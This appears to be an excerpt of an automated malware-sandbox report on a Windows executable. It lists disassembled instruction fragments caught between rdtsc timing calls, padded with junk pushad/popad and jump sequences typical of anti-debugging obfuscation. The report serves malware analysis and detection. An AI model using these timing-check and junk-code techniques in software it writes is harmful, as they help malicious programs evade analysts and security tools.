Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204D6 second address: 71204F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, 99C0h 0x00000012 mov di, 91ECh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204F2 second address: 7120559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FBCB0ED65FCh 0x0000000b adc esi, 6CD43008h 0x00000011 jmp 00007FBCB0ED65FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007FBD21295785h 0x00000020 pushad 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FBCB0ED6602h 0x00000028 add esi, 48485268h 0x0000002e jmp 00007FBCB0ED65FBh 0x00000033 popfd 0x00000034 mov edx, eax 0x00000036 popad 0x00000037 push ecx 0x00000038 mov al, dh 0x0000003a pop ecx 0x0000003b popad 0x0000003c mov eax, 00000000h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120559 second address: 712055D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712055D second address: 7120563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120563 second address: 7120569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120569 second address: 712056D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712056D second address: 712060D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007FBCB0E4CF6Eh 0x00000011 pop ecx 0x00000012 pushfd 0x00000013 jmp 00007FBCB0E4CF6Bh 0x00000018 xor cl, FFFFFFBEh 0x0000001b jmp 00007FBCB0E4CF79h 0x00000020 popfd 0x00000021 popad 0x00000022 call 00007FBCB0E4CF70h 0x00000027 push eax 0x00000028 pop ebx 0x00000029 pop esi 0x0000002a popad 0x0000002b mov dword ptr [esi+04h], eax 0x0000002e pushad 0x0000002f pushad 0x00000030 jmp 00007FBCB0E4CF79h 0x00000035 push ecx 0x00000036 pop ebx 0x00000037 popad 0x00000038 mov cx, D673h 0x0000003c popad 0x0000003d mov dword ptr [esi+08h], eax 0x00000040 pushad 0x00000041 movzx esi, bx 0x00000044 push eax 0x00000045 push edx 0x00000046 call 00007FBCB0E4CF77h 0x0000004b pop ecx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712060D second address: 7120696 instructions: 0x00000000 rdtsc 0x00000002 mov bh, E4h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+0Ch], eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBCB0ED65FEh 0x00000011 or si, 73D8h 0x00000016 jmp 00007FBCB0ED65FBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FBCB0ED6608h 0x00000022 sub ah, 00000038h 0x00000025 jmp 00007FBCB0ED65FBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+4Ch] 0x0000002f jmp 00007FBCB0ED6606h 0x00000034 mov dword ptr [esi+10h], eax 0x00000037 jmp 00007FBCB0ED6600h 0x0000003c mov eax, dword ptr [ebx+50h] 0x0000003f pushad 0x00000040 mov bl, ch 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120696 second address: 71206AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esi+14h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBCB0E4CF6Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71206AF second address: 71206F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FBCB0ED6607h 0x0000000b sbb esi, 70B71B6Eh 0x00000011 jmp 00007FBCB0ED6609h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+54h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71206F8 second address: 71206FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71206FE second address: 7120704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120704 second address: 7120708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120708 second address: 7120784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBCB0ED6606h 0x00000012 adc esi, 018CA148h 0x00000018 jmp 00007FBCB0ED65FBh 0x0000001d popfd 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+58h] 0x00000022 jmp 00007FBCB0ED6605h 0x00000027 mov dword ptr [esi+1Ch], eax 0x0000002a pushad 0x0000002b pushad 0x0000002c mov bh, ah 0x0000002e mov ebx, 0C3D1E4Ah 0x00000033 popad 0x00000034 mov al, bh 0x00000036 popad 0x00000037 mov eax, dword ptr [ebx+5Ch] 0x0000003a jmp 00007FBCB0ED65FAh 0x0000003f mov dword ptr [esi+20h], eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FBCB0ED65FAh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120784 second address: 712078A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712078A second address: 71207C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c jmp 00007FBCB0ED6600h 0x00000011 mov dword ptr [esi+24h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBCB0ED65FAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207C0 second address: 71207C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207C4 second address: 71207CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207CA second address: 71207D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207D0 second address: 71207D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207D4 second address: 71207D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207D8 second address: 7120874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c mov ebx, eax 0x0000000e mov eax, 5017730Dh 0x00000013 popad 0x00000014 mov dword ptr [esi+28h], eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 mov dl, 4Dh 0x0000001b pop ecx 0x0000001c mov cl, dh 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+68h] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FBCB0ED6604h 0x00000029 adc cx, 7F88h 0x0000002e jmp 00007FBCB0ED65FBh 0x00000033 popfd 0x00000034 call 00007FBCB0ED6608h 0x00000039 pushad 0x0000003a popad 0x0000003b pop eax 0x0000003c popad 0x0000003d mov dword ptr [esi+2Ch], eax 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FBCB0ED65FDh 0x00000047 or cx, 2D56h 0x0000004c jmp 00007FBCB0ED6601h 0x00000051 popfd 0x00000052 mov dx, si 0x00000055 popad 0x00000056 mov ax, word ptr [ebx+6Ch] 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120874 second address: 712087A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712087A second address: 7120880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120880 second address: 7120884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120884 second address: 71208CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+30h], ax 0x0000000f jmp 00007FBCB0ED6600h 0x00000014 mov ax, word ptr [ebx+00000088h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBCB0ED65FAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71208CB second address: 71208CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71208CF second address: 71208D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71208D5 second address: 7120953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+32h], ax 0x0000000d jmp 00007FBCB0E4CF70h 0x00000012 mov eax, dword ptr [ebx+0000008Ch] 0x00000018 jmp 00007FBCB0E4CF70h 0x0000001d mov dword ptr [esi+34h], eax 0x00000020 jmp 00007FBCB0E4CF70h 0x00000025 mov eax, dword ptr [ebx+18h] 0x00000028 jmp 00007FBCB0E4CF70h 0x0000002d mov dword ptr [esi+38h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FBCB0E4CF77h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120953 second address: 712098F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 39C0367Ah 0x00000008 push edx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+1Ch] 0x00000010 jmp 00007FBCB0ED65FDh 0x00000015 mov dword ptr [esi+3Ch], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBCB0ED6608h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712098F second address: 7120995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120995 second address: 712099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712099B second address: 712099F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712099F second address: 7120A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+20h] 0x0000000e pushad 0x0000000f mov edi, eax 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 mov dword ptr [esi+40h], eax 0x00000018 jmp 00007FBCB0ED6605h 0x0000001d lea eax, dword ptr [ebx+00000080h] 0x00000023 jmp 00007FBCB0ED65FEh 0x00000028 push 00000001h 0x0000002a jmp 00007FBCB0ED6600h 0x0000002f nop 0x00000030 jmp 00007FBCB0ED6600h 0x00000035 push eax 0x00000036 pushad 0x00000037 mov edx, 279C3914h 0x0000003c mov edi, 668DD280h 0x00000041 popad 0x00000042 nop 0x00000043 jmp 00007FBCB0ED65FFh 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b jmp 00007FBCB0ED6606h 0x00000050 nop 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007FBCB0ED65FEh 0x00000058 sbb si, F328h 0x0000005d jmp 00007FBCB0ED65FBh 0x00000062 popfd 0x00000063 call 00007FBCB0ED6608h 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120B0E second address: 7120B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120B12 second address: 7120B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120B18 second address: 7120B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov eax, 105F0D6Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007FBCB0E4CF74h 0x00000016 mov edx, eax 0x00000018 popad 0x00000019 pushfd 0x0000001a jmp 00007FBCB0E4CF6Eh 0x0000001f add si, 7168h 0x00000024 jmp 00007FBCB0E4CF6Bh 0x00000029 popfd 0x0000002a popad 0x0000002b test edi, edi 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120B67 second address: 7120C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, 07h 0x00000006 popad 0x00000007 call 00007FBCB0ED65FDh 0x0000000c mov ah, 74h 0x0000000e pop edx 0x0000000f popad 0x00000010 js 00007FBD2129513Ah 0x00000016 pushad 0x00000017 jmp 00007FBCB0ED6606h 0x0000001c pushad 0x0000001d mov eax, 0A1FA227h 0x00000022 mov ax, 39C3h 0x00000026 popad 0x00000027 popad 0x00000028 mov eax, dword ptr [ebp-0Ch] 0x0000002b pushad 0x0000002c mov al, 1Eh 0x0000002e pushfd 0x0000002f jmp 00007FBCB0ED6601h 0x00000034 jmp 00007FBCB0ED65FBh 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esi+04h], eax 0x0000003e jmp 00007FBCB0ED6606h 0x00000043 lea eax, dword ptr [ebx+78h] 0x00000046 jmp 00007FBCB0ED6600h 0x0000004b push 00000001h 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FBCB0ED6607h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120C14 second address: 7120C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120C2C second address: 7120C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FBCB0ED65FCh 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FBCB0ED6600h 0x00000016 lea eax, dword ptr [ebp-08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBCB0ED6607h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120C70 second address: 7120CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBCB0E4CF6Fh 0x00000009 and al, FFFFFFFEh 0x0000000c jmp 00007FBCB0E4CF79h 0x00000011 popfd 0x00000012 movzx eax, dx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e movsx edx, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120CF0 second address: 7120CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120CF4 second address: 7120CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120CFA second address: 7120D22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FBD21294F98h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120D22 second address: 7120D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, si 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120D2A second address: 7120D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushad 0x0000000f mov eax, 6925E251h 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 mov dword ptr [esi+08h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120D4B second address: 7120DD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBCB0E4CF6Ah 0x00000009 add ax, E5D8h 0x0000000e jmp 00007FBCB0E4CF6Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FBCB0E4CF78h 0x0000001a sub si, 3038h 0x0000001f jmp 00007FBCB0E4CF6Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 lea eax, dword ptr [ebx+70h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FBCB0E4CF70h 0x00000032 sbb cl, FFFFFF98h 0x00000035 jmp 00007FBCB0E4CF6Bh 0x0000003a popfd 0x0000003b popad 0x0000003c push 00000001h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FBCB0E4CF75h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120DD5 second address: 7120DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120DDB second address: 7120E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FBCB0E4CF74h 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 mov ax, 9EEDh 0x00000016 call 00007FBCB0E4CF6Ah 0x0000001b pushfd 0x0000001c jmp 00007FBCB0E4CF72h 0x00000021 or cl, FFFFFFB8h 0x00000024 jmp 00007FBCB0E4CF6Bh 0x00000029 popfd 0x0000002a pop ecx 0x0000002b popad 0x0000002c lea eax, dword ptr [ebp-18h] 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FBCB0E4CF75h 0x00000036 and ax, A456h 0x0000003b jmp 00007FBCB0E4CF71h 0x00000040 popfd 0x00000041 jmp 00007FBCB0E4CF70h 0x00000046 popad 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120E77 second address: 7120E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120E7B second address: 7120E98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120EE6 second address: 7120EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120EEA second address: 7120EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120EF0 second address: 7120F13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 81h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, E7F8h 0x00000011 jmp 00007FBCB0ED6601h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F13 second address: 7120F43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov ax, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FBD2120B6F6h 0x00000012 jmp 00007FBCB0E4CF75h 0x00000017 mov eax, dword ptr [ebp-14h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F43 second address: 7120F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F47 second address: 7120F5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F5A second address: 7120F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F60 second address: 7120F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F64 second address: 7120F87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b jmp 00007FBCB0ED65FDh 0x00000010 mov ah, 4Bh 0x00000012 popad 0x00000013 mov dword ptr [esi+0Ch], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ecx, ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F87 second address: 7120FC5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBCB0E4CF6Bh 0x00000008 sub esi, 5EBD23DEh 0x0000000e jmp 00007FBCB0E4CF79h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov edx, 775606ECh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ax, 98B5h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120FC5 second address: 7120FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0ED65FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120FD6 second address: 7120FEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d pushad 0x0000000e pushad 0x0000000f mov dx, ax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120FEA second address: 7120FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov eax, 0289E24Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120FF6 second address: 7120FFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
